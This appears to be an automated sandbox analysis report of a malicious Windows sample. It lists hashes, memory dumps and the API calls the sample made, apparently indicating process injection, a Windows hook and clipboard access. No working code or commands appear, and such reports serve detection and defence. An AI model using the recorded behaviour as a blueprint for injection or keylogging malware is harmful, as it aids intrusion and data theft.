                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 3107352869a1b2cde35ca0e42d321e5b1bd4e6cb16ccb1659a8445dc59041a25
                                • Instruction ID: 9aed713e6bb95f4ea878df690353dbe32a029bf1b1eb3d61e109ff8f4badd24b
                                • Opcode Fuzzy Hash: 3107352869a1b2cde35ca0e42d321e5b1bd4e6cb16ccb1659a8445dc59041a25
                                • Instruction Fuzzy Hash: C61112B68003498FDB14CF9AC444BEEFBF8EB48314F10842EE959A7644C3B5A945CFA0
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 060963D6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: a41dd32174d7cacf49475ef6720ee59ac14bfdb9895ea3eef138c15404b8f860
                                • Instruction ID: 31374f77b02bab07e5f2866141e648bc691d0f6f747d6289f2482d78620eb495
                                • Opcode Fuzzy Hash: a41dd32174d7cacf49475ef6720ee59ac14bfdb9895ea3eef138c15404b8f860
                                • Instruction Fuzzy Hash: 6A1126718003499FDF10DFAAC844BEEBBF5EB48310F148429E959A7250CB76A540CBA0
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0131B101,00000800,00000000,00000000), ref: 0131B312
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: bb626f741390a1f8dd10a189fbbad98fb2946e2d80c28104d2d1d39dfecc8de2
                                • Instruction ID: 59eb5278e56cd5fba53454e49c0968ddaed36f13649b80c013b695e2fd782ec6
                                • Opcode Fuzzy Hash: bb626f741390a1f8dd10a189fbbad98fb2946e2d80c28104d2d1d39dfecc8de2
                                • Instruction Fuzzy Hash: CD1112B68003498FDB14CFAAC444BDEFBF4EB88310F14842AE959A7201C375A545CFA0
                                APIs
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 676776151a2b9af3d2510a678092b07269c63960dd246e6edcd0c3d1a6d0e35f
                                • Instruction ID: c1ee6a62f7bd856d029406eed05955e33b4cdd9fbcbce44be3ff920bbde9c81c
                                • Opcode Fuzzy Hash: 676776151a2b9af3d2510a678092b07269c63960dd246e6edcd0c3d1a6d0e35f
                                • Instruction Fuzzy Hash: 4B1176B58003488FDB24DFAAC8447EEFBF5AB88320F24842AD429A7240CA755840CBA4
                                APIs
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 16215da58e07f00078a5e20136d4f28fca9e2b1c894c2dc626f3bb093a2c9650
                                • Instruction ID: e7e0ecabf433bdc804da0562cfbab1883fc317e23875627feb963b7201e1e6f6
                                • Opcode Fuzzy Hash: 16215da58e07f00078a5e20136d4f28fca9e2b1c894c2dc626f3bb093a2c9650
                                • Instruction Fuzzy Hash: C7113AB1D003488FDB14DFAAC8457DEFBF5EB88314F148429D559A7240CB75A944CBA4
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0131B086
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: bb8f23556328169618d3c03c72aee52583aa1d1139cb76e2d36afa19ef1859de
                                • Instruction ID: f3199aa8a43f88a86c89d6dcdedbc3f6db903126f1fd65c3b8f7ffc6cfda44b4
                                • Opcode Fuzzy Hash: bb8f23556328169618d3c03c72aee52583aa1d1139cb76e2d36afa19ef1859de
                                • Instruction Fuzzy Hash: 48111FB5C002498EDB24CFAAD444ADEFBF0AF88314F14802AD869A7205C375A549CFA0
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0131B086
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: df2661b195bb20b1618a9da2963cd38a823b86167f4c291a1b4b818adffab786
                                • Instruction ID: e0651544d9d6432946c40efa636e22899ebbf00f90cbc379989aeff1bc93efad
                                • Opcode Fuzzy Hash: df2661b195bb20b1618a9da2963cd38a823b86167f4c291a1b4b818adffab786
                                • Instruction Fuzzy Hash: 021110B5C007498FDB24CF9AC444BDEFBF4AB88314F10842AD869B7214C375A649CFA1
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 060990DD
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 2b0ac9e7ee7273724a3c3bd99e9c737c32e75669aeb66ec23961f5197755ced9
                                • Instruction ID: 9212c2f8a3a7210c98517810af437cdc57452b760e4fe9753a21d36c31acb67f
                                • Opcode Fuzzy Hash: 2b0ac9e7ee7273724a3c3bd99e9c737c32e75669aeb66ec23961f5197755ced9
                                • Instruction Fuzzy Hash: 9911F5B58007499FDB60DF99C884BDEBFF4EB48320F248519E568A7241C375A544CFA1
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 060990DD
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 50e0dcaa2f03a0b2a7d470991efd1b2c9b986bc913c78023d5d39e20350de444
                                • Instruction ID: cb18f0541a4cd85655a62333cdf6632faa9f7011be96ea0eb0652fe07b46bdfd
                                • Opcode Fuzzy Hash: 50e0dcaa2f03a0b2a7d470991efd1b2c9b986bc913c78023d5d39e20350de444
                                • Instruction Fuzzy Hash: 4811D3B58003499FDB50DF9AD885BDEFBF8FB48320F148419E958A7241C775A944CFA1
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1566444039.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_12bd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8e975be0ea0f8db74b640e0222d86ff72ffbac841d33302cd856305f8f39cae8
                                • Instruction ID: c4b3a314e9e1fd8551228e596c6ad40133816b9a49f5c77114613c4922460096
                                • Opcode Fuzzy Hash: 8e975be0ea0f8db74b640e0222d86ff72ffbac841d33302cd856305f8f39cae8
                                • Instruction Fuzzy Hash: 85214571524208DFDB05DF94E9C0BA6BF65FB8835CF20C169E9090B257C336E456CBA2
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1566594402.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_12cd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8b30ad386d2b9cb686d3b83433d5e5d3f666af584b620539bd374e4ff54bb50d
                                • Instruction ID: 7ba62afc1a43a126b8ef464afcef691f2f7e14b6cbfac9d4aab34b22af02ff69
                                • Opcode Fuzzy Hash: 8b30ad386d2b9cb686d3b83433d5e5d3f666af584b620539bd374e4ff54bb50d
                                • Instruction Fuzzy Hash: A4210071614208DFDB15DFA8D880B26BBA1EB88714F20C67DDA4A0B242C376D447CAA2
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1566594402.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_12cd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 94ad6e37a929f8247aa7134a6bdab224918e81bc53c6126a81e229e2036a81b9
                                • Instruction ID: 5cbb3f31474b67de5033ded8757b5c645414e42351924b6d8f73062c9715f00d
                                • Opcode Fuzzy Hash: 94ad6e37a929f8247aa7134a6bdab224918e81bc53c6126a81e229e2036a81b9
                                • Instruction Fuzzy Hash: C5213771554308DFDB05DF94D9C0B26BB62FB84724F20C67DDA494B253C376D446CAA2
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1566594402.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_12cd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 438ec98cdd109678c35ec0c65a7348888da01868ada7756fae573c1fde500210
                                • Instruction ID: 062b701e37ba180631f0edcd29ae923d39bf13f9346eb8bab8d0e36c2e7c8e6a
                                • Opcode Fuzzy Hash: 438ec98cdd109678c35ec0c65a7348888da01868ada7756fae573c1fde500210
                                • Instruction Fuzzy Hash: 9E2195755083849FCB03CF58D994711BF71EB46314F24C5EAD9498F2A7C33A984ACBA2
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1566444039.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_12bd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                • Instruction ID: 2d6099cff65366957042984b67906f1d4963bc20bb7ac40d55c8d9eb3de082dd
                                • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                • Instruction Fuzzy Hash: FE112676404284CFCB12CF54D5C4B96BF71FB84318F24C6A9D9490B657C33AD45ACBA1
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1566594402.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_12cd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                • Instruction ID: 576fa2bedc423829627bcabec8428628db7f0939e0079a4d54b9f300f628c0fc
                                • Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                • Instruction Fuzzy Hash: 6811EE75544244CFDB02CF54C5C0B15BB62FB84324F24C6ADDA494B253C33AD40ACB92

                                Execution Graph

                                Execution Coverage:10.8%
                                Dynamic/Decrypted Code Coverage:93.2%
                                Signature Coverage:0%
                                Total number of Nodes:191
                                Total number of Limit Nodes:22
                                execution_graph (rendered graph omitted; node and edge list not reproduced): entry nodes 60e78ca, 60efe08, 60e8978, 60ec6d8, ead01c, 1200848 and 60ee120; API calls reached in the graph: GetModuleHandleW, SetWindowsHookExA, CreateWindowExW, DuplicateHandle, OleGetClipboard, CallWindowProcW, KiUserCallbackDispatcher, OleInitialize
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9af8bd40bcac92d633056dc2cffdfae7e2fd8cd72489e4d5c3c2d77f6b280e10
                                • Instruction ID: f1066dc94b44fa14ae035f98be54587e231be7d460cd49ac9f10c4796c29e973
                                • Opcode Fuzzy Hash: 9af8bd40bcac92d633056dc2cffdfae7e2fd8cd72489e4d5c3c2d77f6b280e10
                                • Instruction Fuzzy Hash: 5E530831D10B1A8ADB51EF68C8805A9F7B1FF99300F51C79AE4587B161FB70AAD4CB81
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 898df2d05d350b83226e42fd1d6ef06a9ce7e2ad16600dace769a9c6ca96d2ce
                                • Instruction ID: 437f33d6d9619c9fe467b83469bd23e9209e670b082231c5cb5098a275cf26e6
                                • Opcode Fuzzy Hash: 898df2d05d350b83226e42fd1d6ef06a9ce7e2ad16600dace769a9c6ca96d2ce
                                • Instruction Fuzzy Hash: 88333E31D10B1A8EDB11EF68C8806ADF7B1FF99300F15C79AE459A7251EB70AAC5CB41
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Vek
                                • API String ID: 0-172235318
                                • Opcode ID: b413f0112d57c41258a4ed3ee91a54d4f8455964473ec9d6fbd16d4c3ce12ff3
                                • Instruction ID: 3fadb6e5cbf4d128466aceaa38f44945e0608d570d148b46ae84d91c0f4fb902
                                • Opcode Fuzzy Hash: b413f0112d57c41258a4ed3ee91a54d4f8455964473ec9d6fbd16d4c3ce12ff3
                                • Instruction Fuzzy Hash: 9191AB70E1024ACFDF15DFA9C88479EBBF2BF88304F14C229E614A7295DB748885CB80
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c41440b1f24cba215a4a16c82aa6117e4fb8ca3792e2476c334bc33c7cb2ad1
                                • Instruction ID: d17168b0dee5408501b9c17c393476c9b1bd5538e54cbaa3da38667f898f4217
                                • Opcode Fuzzy Hash: 5c41440b1f24cba215a4a16c82aa6117e4fb8ca3792e2476c334bc33c7cb2ad1
                                • Instruction Fuzzy Hash: DAF1A434B102059FDF15DBA8D494AAEBBB2FF88314F148529E516E7392DB35DC41CB50
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b8f80a80500ed6933498d2160bd920305c84652409b12928fe1628f35e0c6a5
                                • Instruction ID: e36944723a2ce3f339c0bdbd441dc003e271fec6ed7f3999a0a629a141a9c9e0
                                • Opcode Fuzzy Hash: 4b8f80a80500ed6933498d2160bd920305c84652409b12928fe1628f35e0c6a5
                                • Instruction Fuzzy Hash: D7B18070E1024ACFDB11DFA9D88179DBBF2BF88714F14C629DA14E7295EB749881CB81

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph (rendered graph omitted; block edge list not reproduced): basic blocks 1204828-1204a74, calls 1200ab8
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Vek$\Vek
                                • API String ID: 0-1171950776
                                • Opcode ID: 0425a583a6f2bee58be9c10ca65f58af9e360a4922547b2cb03db92b0502173b
                                • Instruction ID: 8430f8f0dbb9982a9926c7109d2cbe4540472b81312501acde22c86f6740a33f
                                • Opcode Fuzzy Hash: 0425a583a6f2bee58be9c10ca65f58af9e360a4922547b2cb03db92b0502173b
                                • Instruction Fuzzy Hash: C3717C70E10389CFDF11DFA9C88079EBBF2AF88714F14C229E614A7295DB749881CB95

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph (rendered graph omitted; block edge list not reproduced): basic blocks 120481c-1204a74, calls 1200ab8
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Vek$\Vek
                                • API String ID: 0-1171950776
                                • Opcode ID: ee715e3065611ae2555e11e845bfb6d8676b061ec6f2f2c21d9cbe3437296f57
                                • Instruction ID: a76e1d6b00ab6e1ad570bef275ce71d836192bc04b570feaa6b065197f375de8
                                • Opcode Fuzzy Hash: ee715e3065611ae2555e11e845bfb6d8676b061ec6f2f2c21d9cbe3437296f57
                                • Instruction Fuzzy Hash: 35717AB0E10289CFDF11DFA9C88179EBBF1AF88714F14C229E614A7295DB749881CB95

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph (rendered graph omitted; block edge list not reproduced): basic blocks 60e896e-60e8ae9, calls CreateWindowExW
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 060E8A8A
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: e117efe39a4a0b090f3893073045992a42ae48afb42c53939ce7cdb10330fbeb
                                • Instruction ID: 00e4852941f8a61e931bf9f411062c6e71105f467b91df3f8196e140fdf9e4c2
                                • Opcode Fuzzy Hash: e117efe39a4a0b090f3893073045992a42ae48afb42c53939ce7cdb10330fbeb
                                • Instruction Fuzzy Hash: CC51AFB1D003199FDB54CF9AC884ADEBFB5FF48310F24852AE819AB250D7759885CF90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph (rendered graph omitted; block edge list not reproduced): basic blocks 60e8978-60e8ae9, calls CreateWindowExW
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 060E8A8A
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 4c4906d8c97358e5547d83eefad9d1428d92c9fb738ee5391b9ccccf22c10fbe
                                • Instruction ID: 60df1cc65af4a638f3c4f9830d16ea0cab0b28984afacd1ff7fefa456560faf6
                                • Opcode Fuzzy Hash: 4c4906d8c97358e5547d83eefad9d1428d92c9fb738ee5391b9ccccf22c10fbe
                                • Instruction Fuzzy Hash: 52419EB1D003199FDB54CF9AD884ADEBFB5FF48310F24812AE819AB250D7759985CF90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph (rendered graph omitted; block edge list not reproduced): basic blocks 60ec28c-60ed684, calls CallWindowProcW and 60e6c24
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 060ED629
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 8dfb336b9de3d3c69270d43711bcbb1d6f840ffc321ef3d30ef1a442c11609b2
                                • Instruction ID: 212f92900607bf0053d599bf7df8ebfd1f810c71d852d0874a82067d366ab8dd
                                • Instruction Fuzzy Hash: 744159B5A00319CFDB54CF99C488BAABBF5FF88314F248459E419AB361D735A841CFA0

                                Control-flow Graph
                                • Function 60ee2ac-60ee3b8, calling OleGetClipboard (rendered graph not reproduced)
                                APIs
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: 55be0500532521172bf01deef07d5ea417cac1ee38598dc67fcef286a1921801
                                • Instruction ID: f5b2c8342c7de5622fad8c495def49d8a7f90722b530614ef53b3459129d3129
                                • Instruction Fuzzy Hash: A131E4B0D0135DDFDB54CFA9C848BDDBFF5AB48304F248029E444AB2A1DBB59885CB65

                                Control-flow Graph
                                • Function 60edca8-60ee3b8, calling OleGetClipboard (rendered graph not reproduced)
                                APIs
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: 145f6be71763ba6d481a72cdc911b3fd26d9655287244b073a35d11f0879097d
                                • Instruction ID: a2b4bbbf281476fed2efbaa08807d0b2a245d7177453a1eeba9967478bf3e912
                                • Instruction Fuzzy Hash: 2C31E5B0D4131CDFDB54CFA9C948B9EBBF5AB48304F248029E404BB390DBB59885CB95

                                Control-flow Graph
                                • Function 60ec6d0-60ec792, calling DuplicateHandle (rendered graph not reproduced)
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060EC75F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 1b7ca82a2e8f73e0f0084b634e872546c39fe81042b8118a152d7fa705dac118
                                • Instruction ID: 7b330fe8341fd0e2e4c0ffaaabd8270434bf72f1704b8370379f2e4dce651951
                                • Instruction Fuzzy Hash: 6121E6B5D002499FDB10CFA9D884AEEBFF5FB48310F14841AE958A7350D375A955CF60

                                Control-flow Graph
                                • Function 60ec6d8-60ec792, calling DuplicateHandle (rendered graph not reproduced)
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060EC75F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 43e110fbc42abc8a6b29fe2d4385421261a515c86229922ee04a11b2936855e7
                                • Instruction ID: 53733aa6ffca8e0bc4cd35c86f23d44565a89fc8e1217596bfb93316aa0c532b
                                • Instruction Fuzzy Hash: AB21E4B59003089FDB10CFAAD884ADEBBF4FB48310F14802AE954A7350D375A944CFA0

                                Control-flow Graph
                                • Function 60efe03-60efeb9, calling SetWindowsHookExA (rendered graph not reproduced)
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 060EFE83
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: af415868c2aac8c06ad8c48262f425bc20662875a9e5975547b85851456f8408
                                • Instruction ID: abb2545ed172637de0f472b413769af3c46177eab54a84c030e8175e62cbb01b
                                • Instruction Fuzzy Hash: 962147B1D002199FDB54CFAAC844BEEFBF5BB88320F10842AE458A7250C774A940CFA0

                                Control-flow Graph
                                • Function 60efe08-60efeb9, calling SetWindowsHookExA (rendered graph not reproduced)
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 060EFE83
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: c17e4a0a03e310fd45eb5ff06872f6561132d1d0213d39ae2f104bc2fa6a6daf
                                • Instruction ID: 48be23d9a1b39bdab1fcbd93e874d4ba91d26ed910cb15087da516f37e5188c1
                                • Instruction Fuzzy Hash: 472124B5D002199FDB54CFAAC844BEEFBF5BB88320F10842AE458A7250D774A944CFA1

                                Control-flow Graph
                                • Function 60e5e3c-60e7960, calling GetModuleHandleW (rendered graph not reproduced)
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 060E7936
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: f6593f62359151c2a7a91a885635de46a282a158ec70fa6eea6c44376e51b806
                                • Instruction ID: e187927a4b8f3ea6032ff80e7d479c311ca420daa3057fa4b645d145c0c5f5a8
                                • Instruction Fuzzy Hash: 0F11FDB5C006598FDB60CF9AC844B9EFBF4EF88220F10846AD869A7610D379A545CFA1

                                Control-flow Graph
                                • Function 60ee169-60ee1f8, calling OleInitialize (rendered graph not reproduced)
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 060EE1C5
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 2ba0959af52fab561182bf43796cece797dadb6dcef4490c1047c3bf390bee5e
                                • Instruction ID: 8b206525cbc2f542204b26b1b6ba5d1c80d30658de7826392c5f620535329544
                                • Instruction Fuzzy Hash: E51115B58003498FDB50CFAAC844BDEFFF4EB48324F248469D559A7610C375A544CFA5
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,060ED87D), ref: 060ED907
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 46a270ffb36d0e6cbbe8f0528235ebf271f1ac108c6215a542a22e1b4f75ef24
                                • Instruction ID: 20323449672a044881ff3cd77393905a93d0f449526e1516405feab8192e9a4a
